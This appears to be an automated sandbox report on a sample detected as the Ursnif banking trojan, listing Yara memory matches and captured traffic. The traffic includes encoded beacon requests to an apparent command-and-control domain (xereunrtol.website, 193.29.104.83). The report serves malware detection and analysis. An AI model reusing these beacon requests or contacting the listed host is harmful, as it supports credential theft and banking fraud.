                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 973402f4-6725-3934-5235-dbb411665df2Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB3PR08CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1X-FEServer: DB3PR08CA0032X-Powered-By: ASP.NETX-FEServer: AM6P193CA0099Date: Fri, 08 Oct 2021 04:45:27 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1X-FEServer: DB6P195CA0005X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0006Date: Fri, 08 Oct 2021 04:45:32 GMTConnection: close
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000017.00000003.757597977.0000026CBE674000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownDNS traffic detected: queries for: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: global trafficHTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
                      Source: unknownHTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
